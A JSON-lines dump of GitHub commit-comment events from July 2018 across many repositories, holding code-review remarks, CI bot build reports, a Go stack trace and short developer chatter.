{"id":"8025690598","type":"CommitCommentEvent","actor":{"login":"amanjeev"},"repo":{"name":"sos-os/alarm"},"payload":{"comment":{"id":29851569,"position":36,"line":36,"path":"alarm-test/src/lib.rs","commit_id":"e1d03333e262c88c2abb59e6886dd20e007dea40","created_at":"2018-07-26T23:10:43Z","updated_at":"2018-07-26T23:10:43Z","author_association":"MEMBER","body":"Is it too late to say I swear I was doing this? :upside_down_face:  This is very helpful though.\r\n\r\nBTW, do you mean `MockAddress(&self.frame[0] as *const _ as usize)` instead of `MockFrame(self.frame[0] as *const _ as usize)`? \r\n\r\n* Shouldn't it be `MockAddress` (return type is `Address`)\r\n* And `&self.frame[0]` (or did I forget about `&self` yet again hehe)"}},"created_at":"2018-07-26T23:10:43Z"}
{"id":"8025690928","type":"CommitCommentEvent","actor":{"login":"PiBa-NL"},"repo":{"name":"pfsense/FreeBSD-ports"},"payload":{"comment":{"id":29851573,"position":null,"line":null,"path":null,"commit_id":"7c2caf5a2b8f4169832e30d03ab8987198f86bda","created_at":"2018-07-26T23:10:50Z","updated_at":"2018-07-26T23:10:50Z","author_association":"CONTRIBUTOR","body":"preliminary 'quick fix' send.., should be easy to apply the 2 changed lines manually for those who want need it 'now':  https://github.com/pfsense/FreeBSD-ports/pull/542/files#diff-eb226b2eb58fc682fb444d554fb6bab8\r\n\r\nthanks @martyndykstra for the first quick test :)"}},"created_at":"2018-07-26T23:10:50Z"}
{"id":"8025696285","type":"CommitCommentEvent","actor":{"login":"hjdivad"},"repo":{"name":"emberjs/data"},"payload":{"comment":{"id":29851593,"position":25,"line":655,"path":"addon/-record-data-private/system/relationships/state/relationship.js","commit_id":"39c8238d2b123c0921d013fe0f5f8d3577bed0f2","created_at":"2018-07-26T23:12:35Z","updated_at":"2018-07-26T23:12:35Z","author_association":"MEMBER","body":"Does this mean that we interpret `data === undefined` as `data === []` *only* in the sync case, but *not* in the async case?\r\n\r\nIs that consistent with prior behaviour?\r\n\r\nIf so, let's add a comment explaining this because the commit message + pr do not provide the context necessary to understand this otherwise surprising code."}},"created_at":"2018-07-26T23:12:35Z"}
{"id":"8025697390","type":"CommitCommentEvent","actor":{"login":"syue87"},"repo":{"name":"syue87/GCodeAnalyser"},"payload":{"comment":{"id":29851597,"position":4,"line":953,"path":"js/gcodeProcessor.js","commit_id":"627b792dc84ef70c2083103c7d2fce0debd7e8bd","created_at":"2018-07-26T23:12:53Z","updated_at":"2018-07-26T23:12:53Z","author_association":"OWNER","body":"G90 and G91 also affects, XYZ movement. I had \"G91, some gcode, G90\" in my starting gcode to move Z relatively, it caused the program to change the extrusion mode to absolute."}},"created_at":"2018-07-26T23:12:53Z"}
{"id":"8025699291","type":"CommitCommentEvent","actor":{"login":"chaudhari31"},"repo":{"name":"rsmarples/openresolv"},"payload":{"comment":{"id":29851600,"position":null,"line":null,"path":null,"commit_id":"a694a49c41ffdc0e215320459af009d44482b065","created_at":"2018-07-26T23:13:33Z","updated_at":"2018-07-26T23:13:33Z","author_association":"NONE","body":"getopt or getopts ?\r\n\r\nI have already getopt binary. "}},"created_at":"2018-07-26T23:13:33Z"}
{"id":"8025701541","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/tqdm-feedstock"},"payload":{"comment":{"id":29851613,"position":null,"line":null,"path":null,"commit_id":"5d2ad2d36b49fccd9b163071be5d235e12ad2e9f","created_at":"2018-07-26T23:14:21Z","updated_at":"2018-07-26T23:14:21Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @lrq3000 was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-26T23:14:21Z"}
{"id":"8025702060","type":"CommitCommentEvent","actor":{"login":"daniefer"},"repo":{"name":"DylanZocchi/netcore-workbook"},"payload":{"comment":{"id":29851616,"position":14,"line":14,"path":"Lesson02/BaseProject/BaseProject/Intrastructure/TagHelpers/DisableAutoCompleteTagHelper.cs","commit_id":"e5d0e3328cb4a105d336d40cedcc0122a2799ff3","created_at":"2018-07-26T23:14:31Z","updated_at":"2018-07-26T23:14:31Z","author_association":"NONE","body":"While this does work, there is a better way to do this that does not involve creating a element with a space in the name. Take a look at some of the other properties and methods available to you on `output`."}},"created_at":"2018-07-26T23:14:31Z"}
{"id":"8025707910","type":"CommitCommentEvent","actor":{"login":"chaudhari31"},"repo":{"name":"rsmarples/openresolv"},"payload":{"comment":{"id":29851633,"position":null,"line":null,"path":null,"commit_id":"a694a49c41ffdc0e215320459af009d44482b065","created_at":"2018-07-26T23:16:28Z","updated_at":"2018-07-26T23:16:28Z","author_association":"NONE","body":"I would suggest to change the script and use '**getopt**' rather than '**getopts**' so it will work for all OS without 'bash' dependency. "}},"created_at":"2018-07-26T23:16:28Z"}
{"id":"8025709997","type":"CommitCommentEvent","actor":{"login":"WilliamAche"},"repo":{"name":"jcdiazvale/vanilla"},"payload":{"comment":{"id":29851640,"position":2,"line":2,"path":"dulce_descanso.md","commit_id":"39b2ee4e15f9489acb586ab1a0ba5648aec3d353","created_at":"2018-07-26T23:17:10Z","updated_at":"2018-07-26T23:17:10Z","author_association":"COLLABORATOR","body":"-"}},"created_at":"2018-07-26T23:17:10Z"}
{"id":"8025711756","type":"CommitCommentEvent","actor":{"login":"WilliamAche"},"repo":{"name":"jcdiazvale/vanilla"},"payload":{"comment":{"id":29851645,"position":2,"line":2,"path":"dulce_descanso.md","commit_id":"39b2ee4e15f9489acb586ab1a0ba5648aec3d353","created_at":"2018-07-26T23:17:43Z","updated_at":"2018-07-26T23:17:43Z","author_association":"COLLABORATOR","body":"hola\r\n"}},"created_at":"2018-07-26T23:17:43Z"}
{"id":"8025712086","type":"CommitCommentEvent","actor":{"login":"trevorturk"},"repo":{"name":"trevorturk/flash_cookie_session"},"payload":{"comment":{"id":29851646,"position":null,"line":null,"path":null,"commit_id":"28a436916cd165f4cce7fc1171d3af7a131b6010","created_at":"2018-07-26T23:17:51Z","updated_at":"2018-07-26T23:17:51Z","author_association":"OWNER","body":"Sorry I'm not planning on maintaining the gem anymore -- you can use directly from GitHub or just copy the code into your own app?"}},"created_at":"2018-07-26T23:17:51Z"}
{"id":"8025717158","type":"CommitCommentEvent","actor":{"login":"frap129"},"repo":{"name":"pimpmaneaton/android_frameworks_base"},"payload":{"comment":{"id":29851659,"position":null,"line":null,"path":null,"commit_id":"7facfb00005f6d815e70bfc037d06c35f9acabd2","created_at":"2018-07-26T23:19:33Z","updated_at":"2018-07-26T23:19:33Z","author_association":"NONE","body":"That's possible with my original commit, no changes required. You just need\nezios part that sends the intent, which wouldn't be in any of the ambient\nmusic files\n\nOn Thu, Jul 26, 2018, 6:51 PM Pimpmaneaton <notifications@github.com> wrote:\n\n> I am hoping for the possibility of having both.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/pimpmaneaton/android_frameworks_base/commit/7facfb00005f6d815e70bfc037d06c35f9acabd2#commitcomment-29851417>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIZ-VI9_YOO6TQgzH2wHbUe2Kms-ktkpks5uKkgHgaJpZM4ViNjf>\n> .\n>\n"}},"created_at":"2018-07-26T23:19:33Z"}
{"id":"8025721778","type":"CommitCommentEvent","actor":{"login":"nukeguard"},"repo":{"name":"nukeguard/NaniteConstructionSystem"},"payload":{"comment":{"id":29851665,"position":null,"line":null,"path":null,"commit_id":"772213689c5dff9fc94edeaa2e1039dbfe6a9809","created_at":"2018-07-26T23:21:00Z","updated_at":"2018-07-26T23:21:00Z","author_association":"OWNER","body":"Adding this in and testing it out, should have update out tonight or tomorrow"}},"created_at":"2018-07-26T23:21:00Z"}
{"id":"8025723100","type":"CommitCommentEvent","actor":{"login":"abhiutd"},"repo":{"name":"rai-project/dlframework"},"payload":{"comment":{"id":29851671,"position":null,"line":null,"path":null,"commit_id":"dbdd2ae44bda571a2ab35fe4344471c7b0932518","created_at":"2018-07-26T23:21:27Z","updated_at":"2018-07-26T23:21:27Z","author_association":"CONTRIBUTOR","body":"Error log - \r\n\r\nCompiling using :: go []string{\"build\", \"-tags=noasm\", \"/home/as29/.gvm/pkgsets/go1.10/global/src/github.com/rai-project/mxnet/mxnet-agent/main.go\"}\r\n\"Running\" \"mxnet\" \"::\" \"SqueezeNet_1.0\" \"on\" \"gpu\" \"with batch size\" 32\r\nRunning dataset --debug --verbose --publish=false --fail_on_error=true --gpu=true --batch_size=32 --model_name=SqueezeNet --model_version=1.0 /tmp/go-build967851543/b001/exe/evaluate\r\npanic: runtime error: invalid memory address or nil pointer dereference\r\n[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x12763b4]\r\n\r\ngoroutine 1 [running]:\r\ngithub.com/rai-project/mxnet/vendor/github.com/rai-project/dlframework/framework/cmd/server.glob..func19(0x24290c0, 0xc420287c20, 0x1, 0x9, 0x0, 0x0)\r\n\t/home/as29/.gvm/pkgsets/go1.10/global/src/github.com/rai-project/mxnet/vendor/github.com/rai-project/dlframework/framework/cmd/server/predict_dataset.go:118 +0x174\r\ngithub.com/rai-project/mxnet/vendor/github.com/spf13/cobra.(*Command).execute(0x24290c0, 0xc420287b90, 0x9, 0x9, 0x24290c0, 0xc420287b90)\r\n\t/home/as29/.gvm/pkgsets/go1.10/global/src/github.com/rai-project/mxnet/vendor/github.com/spf13/cobra/command.go:762 +0x468\r\ngithub.com/rai-project/mxnet/vendor/github.com/spf13/cobra.(*Command).ExecuteC(0xc4203c8280, 0x1716ae7, 0x127b280, 0xc4203c8280)\r\n\t/home/as29/.gvm/pkgsets/go1.10/global/src/github.com/rai-project/mxnet/vendor/github.com/spf13/cobra/command.go:852 +0x30a\r\ngithub.com/rai-project/mxnet/vendor/github.com/spf13/cobra.(*Command).Execute(0xc4203c8280, 0x1716ae7, 0x5)\r\n\t/home/as29/.gvm/pkgsets/go1.10/global/src/github.com/rai-project/mxnet/vendor/github.com/spf13/cobra/command.go:800 +0x2b\r\nmain.main()\r\n\t/home/as29/.gvm/pkgsets/go1.10/global/src/github.com/rai-project/mxnet/mxnet-agent/main.go:19 +0xc8\r\nERRO[0008] failed to wait for command                    cmd=\"dataset --debug --verbose --publish=false --fail_on_error=true --gpu=true --batch_size=32 --model_name=SqueezeNet --model_version=1.0 /tmp/go-build967851543/b001/exe/evaluate\" error=\"exit status 2\" pkg=dlframework/framework/cmd/evaluate\r\n\"Finished running\" \"mxnet\" \"::\" \"SqueezeNet_1.0\" \"on\" \"gpu\""}},"created_at":"2018-07-26T23:21:27Z"}
{"id":"8025727774","type":"CommitCommentEvent","actor":{"login":"StoniVR"},"repo":{"name":"Fishbiter/gz3doom"},"payload":{"comment":{"id":29851682,"position":null,"line":null,"path":null,"commit_id":"044472e9b580bac93a5adcbea0203d1dc0b9b259","created_at":"2018-07-26T23:23:05Z","updated_at":"2018-07-26T23:23:05Z","author_association":"NONE","body":"Hey really nice news its late at night and i test only shot. The new version i cant use my touchs to navigate menu. :D  I cant set any Buttons. But Castlevania start. :D"}},"created_at":"2018-07-26T23:23:05Z"}
{"id":"8025749563","type":"CommitCommentEvent","actor":{"login":"dhood"},"repo":{"name":"ros2/ci"},"payload":{"comment":{"id":29851731,"position":null,"line":null,"path":null,"commit_id":"feddd1fea33b0cfdd7cd9feb2de54ad2a929f9b8","created_at":"2018-07-26T23:30:45Z","updated_at":"2018-07-26T23:30:45Z","author_association":"MEMBER","body":"did we mean to remove this line now, or later? https://github.com/ros2/ci/commit/feddd1fea33b0cfdd7cd9feb2de54ad2a929f9b8#diff-42a7cd652d15099c3f6b6c27e05dce31R217"}},"created_at":"2018-07-26T23:30:45Z"}
{"id":"8025752350","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29851738,"position":null,"line":null,"path":null,"commit_id":"6d3facc741cab8cd093a7affcddacee8abb6832d","created_at":"2018-07-26T23:31:41Z","updated_at":"2018-07-26T23:31:41Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6d3facc741cab8cd093a7affcddacee8abb6832d-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-26T23:31:41Z"}
{"id":"8025755135","type":"CommitCommentEvent","actor":{"login":"kalbasit"},"repo":{"name":"bazelbuild/rules_nodejs"},"payload":{"comment":{"id":29851744,"position":144,"line":248,"path":"internal/node/node_repositories.bzl","commit_id":"ce8148b7de3a3d7621e47d26dc30e21fd0849a14","created_at":"2018-07-26T23:32:38Z","updated_at":"2018-07-26T23:32:38Z","author_association":"NONE","body":"I just noticed the double `{{`, was that intended?"}},"created_at":"2018-07-26T23:32:38Z"}
{"id":"8025756211","type":"CommitCommentEvent","actor":{"login":"bossanova808"},"repo":{"name":"FosterCommerce/CommerceRegisterOnCheckout"},"payload":{"comment":{"id":29851747,"position":null,"line":null,"path":null,"commit_id":"3e3470f23e006ce3f35a3bc9408ef4f19028a9c6","created_at":"2018-07-26T23:33:01Z","updated_at":"2018-07-26T23:33:01Z","author_association":"NONE","body":"Well, I'll probably _have_ to point Craft 3 bugs at you until I get into that a bit...I've not gone much past just installing Craft 3 yet.  And with Commerce 2, I am really probably unlikely to actually launch my site on that before that's actually officially out of beta (or close to it) - since the income of around 10 folks depends on our site, I'm taking a pretty cautious approach there....which is another reason I've been waiting to get started, to let the dust settle a bit and the major bugs out of the way I guess.\r\n\r\nBut yeah, longer term I'd like to hang on to this, I just find it keeps me motivated to keep it up to date (with this noticeable exception due to the degree of changed with Craft3 and slower release of Commerce 2!).  Maybe note in the Craft 3 readme something about this for now.\r\n\r\n(I was still tossing up putting $10 on a few of my addons, just to kinda sort out the wheat from the chaff when it came to support, although odds are high that I won't, but I'd like to keep the option open at least, once I get there - just in case my thinking changes on that).\r\n\r\nNow, my plan was to probably make the Craft 3 version the master branch, and the Craft-2 a separate branch since that won't get much work anymore, and that seems to be how most folks are doing it.  Happy to do that later, though, but obviously the goal is to put this (and my others) into the plugin store.  No particular hurry, though, I'm not too fussed until Commerce 2 is out of beta really.  \r\n\r\nWith any luck next month Ill finally get into all this myself properly!"}},"created_at":"2018-07-26T23:33:01Z"}
{"id":"8025756329","type":"CommitCommentEvent","actor":{"login":"kalbasit"},"repo":{"name":"bazelbuild/rules_nodejs"},"payload":{"comment":{"id":29851748,"position":144,"line":248,"path":"internal/node/node_repositories.bzl","commit_id":"ce8148b7de3a3d7621e47d26dc30e21fd0849a14","created_at":"2018-07-26T23:33:04Z","updated_at":"2018-07-26T23:33:04Z","author_association":"NONE","body":"cc @huangw5 @alexeagle "}},"created_at":"2018-07-26T23:33:04Z"}
{"id":"8025757004","type":"CommitCommentEvent","actor":{"login":"juliadrozd"},"repo":{"name":"juliadrozd/juliadrozd.github.io"},"payload":{"comment":{"id":29851749,"position":null,"line":null,"path":null,"commit_id":"99c0f4f4c447d068c767501b145a17be222e2fb5","created_at":"2018-07-26T23:33:17Z","updated_at":"2018-07-26T23:33:17Z","author_association":"OWNER","body":"up"}},"created_at":"2018-07-26T23:33:17Z"}
{"id":"8025758103","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29851754,"position":null,"line":null,"path":null,"commit_id":"9655ee264b3c2db52e7cf57fe0d73e331d2e9461","created_at":"2018-07-26T23:33:38Z","updated_at":"2018-07-26T23:33:38Z","author_association":"NONE","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2324 of 2324 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T23:33:38Z"}
{"id":"8025758361","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29851755,"position":null,"line":null,"path":null,"commit_id":"d1bc6a73987444d40ebb5f54a85a9d59220aa55d","created_at":"2018-07-26T23:33:42Z","updated_at":"2018-07-26T23:33:42Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/d1bc6a73987444d40ebb5f54a85a9d59220aa55d/index.html"}},"created_at":"2018-07-26T23:33:42Z"}
{"id":"8025761848","type":"CommitCommentEvent","actor":{"login":"tgreeff"},"repo":{"name":"tgreeff/Onyx"},"payload":{"comment":{"id":29851763,"position":null,"line":null,"path":null,"commit_id":"7ad878f05c63f2520e921832dbb9c62564d66d12","created_at":"2018-07-26T23:35:03Z","updated_at":"2018-07-26T23:35:03Z","author_association":"OWNER","body":"Thought I had changed more stuff here. I guess not."}},"created_at":"2018-07-26T23:35:03Z"}
{"id":"8025762123","type":"CommitCommentEvent","actor":{"login":"StoniVR"},"repo":{"name":"Fishbiter/gz3doom"},"payload":{"comment":{"id":29851764,"position":null,"line":null,"path":null,"commit_id":"044472e9b580bac93a5adcbea0203d1dc0b9b259","created_at":"2018-07-26T23:35:09Z","updated_at":"2018-07-26T23:35:09Z","author_association":"NONE","body":"Good news. But i can´t use my touchs with new version. The Gun is tracked but no buttons work. "}},"created_at":"2018-07-26T23:35:09Z"}
{"id":"8025762387","type":"CommitCommentEvent","actor":{"login":"garumilli"},"repo":{"name":"flippable/scripts"},"payload":{"comment":{"id":29851765,"position":null,"line":null,"path":null,"commit_id":"2cfe7e863f71e8cecb69884c9d4f29ea9ca3f449","created_at":"2018-07-26T23:35:15Z","updated_at":"2018-07-26T23:35:15Z","author_association":"NONE","body":"@zoombear not seeing the actual script for some reason - did it get added?"}},"created_at":"2018-07-26T23:35:15Z"}
{"id":"8025769245","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29851788,"position":null,"line":null,"path":null,"commit_id":"5d31b27e3e6c518f2ce9a6e44527e3a246fb14c3","created_at":"2018-07-26T23:37:45Z","updated_at":"2018-07-26T23:37:45Z","author_association":"NONE","body":"Myoldmopar-patch-1 (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2948 of 2948 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d31b27e3e6c518f2ce9a6e44527e3a246fb14c3-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d31b27e3e6c518f2ce9a6e44527e3a246fb14c3-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T23:37:45Z"}
{"id":"8025770108","type":"CommitCommentEvent","actor":{"login":"Artamedes"},"repo":{"name":"ProjectSkyfire/SkyFire.548"},"payload":{"comment":{"id":29851790,"position":null,"line":null,"path":null,"commit_id":"f1b78876fcb3f4c4b6e39290c6b7d875690c3442","created_at":"2018-07-26T23:38:03Z","updated_at":"2018-07-26T23:38:03Z","author_association":"NONE","body":"@AriDEV https://gist.github.com/Artamedes/71d649724208d68ed3577ae564574788"}},"created_at":"2018-07-26T23:38:03Z"}
{"id":"8025772413","type":"CommitCommentEvent","actor":{"login":"ScottW514"},"repo":{"name":"ScottW514/meta-openglow"},"payload":{"comment":{"id":29851791,"position":null,"line":null,"path":null,"commit_id":"a40df410afdd72f0b4469a51cbfa7834bbc49baf","created_at":"2018-07-26T23:38:54Z","updated_at":"2018-07-26T23:38:54Z","author_association":"OWNER","body":"The exhaust and intake fans would spin up during initial power on until the driver for the fan controller loaded.  It was only for about 1-2 seconds, but it was annoying.  Configured u-boot to initialize the fan controller (I2C) to stop the fan spin up."}},"created_at":"2018-07-26T23:38:54Z"}
{"id":"8025784337","type":"CommitCommentEvent","actor":{"login":"xC0rp"},"repo":{"name":"Lehks/NostraEngine"},"payload":{"comment":{"id":29851812,"position":null,"line":null,"path":null,"commit_id":"c59d3955f1f6c6cb70b1ec4fb063a1ebb4b3006b","created_at":"2018-07-26T23:43:20Z","updated_at":"2018-07-26T23:43:20Z","author_association":"COLLABORATOR","body":"#103 "}},"created_at":"2018-07-26T23:43:20Z"}
{"id":"8025789431","type":"CommitCommentEvent","actor":{"login":"isghe"},"repo":{"name":"lvaccaro/c-opentimestamps"},"payload":{"comment":{"id":29851829,"position":null,"line":null,"path":null,"commit_id":"d9340b94ce95696828228f94c5f3c3a059dc46f4","created_at":"2018-07-26T23:45:16Z","updated_at":"2018-07-26T23:45:16Z","author_association":"NONE","body":"`the literal 0 has a bad tendency to acquire the type int` while we are handling pointers."}},"created_at":"2018-07-26T23:45:16Z"}
{"id":"8025790387","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29851834,"position":null,"line":null,"path":null,"commit_id":"ca6007fff3751aaa2c7429dca88a114e94b4494e","created_at":"2018-07-26T23:45:37Z","updated_at":"2018-07-26T23:45:37Z","author_association":"OWNER","body":"@protonspring I think this has failed in the past, but I don't recall which test.  I'll take a look...\r\n\r\n@Rocky640 I really appreciate your feedback but respectfully disagree.  Perhaps I'm missing something; this is my reasoning.\r\n\r\nImagine we had two variables for `mobilityArea`.  We used `mobilityAreaPieces` in `pieces()` and `mobilityAreaKing` in `king()`.  Perhaps they were even defined slightly differently.  Surely it would be a good idea to try to simplify and unify these mobility areas so a single Bitboard could be used in both functions, as we currently do in master.  To define this variable twice would be redundant.  \r\n\r\nBut the points you made about this test could also be said about this hypothetical mobilityArea simplification.  We would be re-using a variable (`mobilityArea`) in another place--in fact, in two entirely separate functions--where they may have originally had slightly different meanings. \r\n\r\nAs you mentioned, RookOnPawn and ThreatByRook[PAWN] are not unrelated bonuses.  One is a bonus for threats on pawns; one is a bonus for threats on pawns if the rook is on particular ranks.  The idea \"apply this bonus as-is, or scale it if another condition is met\" can be found throughout SF's evaluation, as it should be.  For example, the Outpost bonus, \r\n```c++\r\n            // Bonus if piece is on an outpost square or can reach one\r\n            bb = OutpostRanks & ~pe->pawn_attacks_span(Them);\r\n            if (bb & s)\r\n                score += Outpost[Pt == BISHOP][bool(attackedBy[Us][PAWN] & s)] * 2;\r\n\r\n            else if (bb &= b & ~pos.pieces(Us))\r\n                score += Outpost[Pt == BISHOP][bool(attackedBy[Us][PAWN] & bb)];\r\n```\r\nand the new ThreatByRank code,\r\n```c++\r\n            if (type_of(pos.piece_on(s)) != PAWN)\r\n                score += ThreatByRank * (int)relative_rank(Them, s);\r\n\r\n            else if ((pos.blockers_for_king(Them) | shift<Up>(pos.pieces(Us))) & s)\r\n                score += ThreatByRank * (int)relative_rank(Them, s) / 2;\r\n```\r\nuse the same principle.  We could define separate Scores in these instances, but that would be unnecessary complexity.  The point of this patch is that having separate scores for ThreatByRook[PAWN] and RookOnPawn is also unnecessary complexity.  This patch effectively does the following:\r\n```\r\nif rook is on certain ranks:\r\n     bonus += its number of pawn threats * ThreatByRook[PAWN] * 2;\r\nelse:\r\n     bonus += its number of pawn threats * ThreatByRook[PAWN];\r\n```\r\nI don't think this patch helps or hurts changes to the conditions of either bonus.  If one needs to be tuned separately, an [0, 5] test can return this complexity.  For now, I don't think SF needs it."}},"created_at":"2018-07-26T23:45:37Z"}
{"id":"8025790684","type":"CommitCommentEvent","actor":{"login":"Aleksandar43"},"repo":{"name":"Aleksandar43/Wall-Breaker"},"payload":{"comment":{"id":29851835,"position":53,"line":298,"path":"src/aleksandar43/wallbreaker/main/WallBreaker.java","commit_id":"c2e5ed32d5f3c285d7256a67819c041157eabc08","created_at":"2018-07-26T23:45:45Z","updated_at":"2018-07-26T23:45:45Z","author_association":"OWNER","body":"This is the main change."}},"created_at":"2018-07-26T23:45:45Z"}
{"id":"8025792363","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29851837,"position":null,"line":null,"path":null,"commit_id":"e27d9e4dcb94317ff1ba7d607b4f0dd2e8341e73","created_at":"2018-07-26T23:46:25Z","updated_at":"2018-07-26T23:46:25Z","author_association":"COLLABORATOR","body":"check the \"fuzzy\" "}},"created_at":"2018-07-26T23:46:25Z"}
{"id":"8025793465","type":"CommitCommentEvent","actor":{"login":"dirk-thomas"},"repo":{"name":"ros2/ci"},"payload":{"comment":{"id":29851840,"position":null,"line":null,"path":null,"commit_id":"feddd1fea33b0cfdd7cd9feb2de54ad2a929f9b8","created_at":"2018-07-26T23:46:49Z","updated_at":"2018-07-26T23:46:49Z","author_association":"MEMBER","body":"Good catch, indeed that was the idea. I even remember removing the line in my editor... Will make another commit to fix..."}},"created_at":"2018-07-26T23:46:49Z"}
{"id":"8025795193","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29851842,"position":null,"line":null,"path":null,"commit_id":"b10ddc54812c3474fb15287e65e3918fb11abe8a","created_at":"2018-07-26T23:47:27Z","updated_at":"2018-07-26T23:47:27Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-293](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-293).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-293-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-26T23:47:27Z"}
{"id":"8025795467","type":"CommitCommentEvent","actor":{"login":"depeele"},"repo":{"name":"Polymer/lit-html"},"payload":{"comment":{"id":29851843,"position":null,"line":null,"path":null,"commit_id":"8697b40f67e1275defaf57648ed6bec9fd0e0160","created_at":"2018-07-26T23:47:34Z","updated_at":"2018-07-26T23:47:34Z","author_association":"NONE","body":"Turns out, the WebComponents standards committee decided to rename `:unresolved` to `:not(:defined)` ([w3c/webcomponents issue 418](https://github.com/w3c/webcomponents/issues/418)).\r\n\r\nSee https://codepen.io/depeele/pen/gjGPRy which uses `lit-html:v0.10.1` and the new pseudo-property."}},"created_at":"2018-07-26T23:47:34Z"}
{"id":"8025796861","type":"CommitCommentEvent","actor":{"login":"miguelsousa"},"repo":{"name":"fonttools/fonttools"},"payload":{"comment":{"id":29851849,"position":null,"line":null,"path":null,"commit_id":"68951b7c3d415b62f059e3cf02f61398305a5d99","created_at":"2018-07-26T23:48:07Z","updated_at":"2018-07-26T23:48:07Z","author_association":"COLLABORATOR","body":"@anthrotype `cvParameters` blocks (used in cvXX features) can also contain references to nameIDs."}},"created_at":"2018-07-26T23:48:07Z"}
{"id":"8025797527","type":"CommitCommentEvent","actor":{"login":"VirtuBox"},"repo":{"name":"VirtuBox/nginx-ee"},"payload":{"comment":{"id":29851852,"position":null,"line":null,"path":null,"commit_id":"4e4abffb94ff1921cfe696e6d16e36e07fb95744","created_at":"2018-07-26T23:48:21Z","updated_at":"2018-07-26T23:48:21Z","author_association":"OWNER","body":"Hello @nsgoyat,\nopenssl is compiled by nginx-ee bash script to build nginx with the latest openssl release, but it doesn't run the command `make install ` to replace the server openssl package. \n\n\n\n"}},"created_at":"2018-07-26T23:48:21Z"}
{"id":"8025798569","type":"CommitCommentEvent","actor":{"login":"riknoll"},"repo":{"name":"Microsoft/pxt-common-packages"},"payload":{"comment":{"id":29851857,"position":null,"line":null,"path":null,"commit_id":"a0803916a35e1f7d0aee0146e0bca7caeb201882","created_at":"2018-07-26T23:48:46Z","updated_at":"2018-07-26T23:48:46Z","author_association":"MEMBER","body":"I really don't like the whole while statement thing we're doing there. I know it's not part of your change but we should revisit that later..."}},"created_at":"2018-07-26T23:48:46Z"}
{"id":"8025803421","type":"CommitCommentEvent","actor":{"login":"rafael-suguiura-gs"},"repo":{"name":"ghiden/angucomplete-alt"},"payload":{"comment":{"id":29851870,"position":4,"line":596,"path":"angucomplete-alt.js","commit_id":"02ffc620e835691ba4ad2a725ab89ead2a884df3","created_at":"2018-07-26T23:50:34Z","updated_at":"2018-07-26T23:50:34Z","author_association":"NONE","body":"When `scope.currentIndex` is `null`, `scope.currentIndex ++` turns out to be **1**. As a result, whenever we use the down button to select, it skips the first element."}},"created_at":"2018-07-26T23:50:34Z"}
{"id":"8025805954","type":"CommitCommentEvent","actor":{"login":"riknoll"},"repo":{"name":"Microsoft/pxt-common-packages"},"payload":{"comment":{"id":29851875,"position":null,"line":null,"path":null,"commit_id":"a19e54f074313083230d3e470afda4fd25ce7767","created_at":"2018-07-26T23:51:29Z","updated_at":"2018-07-26T23:51:29Z","author_association":"MEMBER","body":"I believe that `&&` should be an `||`"}},"created_at":"2018-07-26T23:51:29Z"}
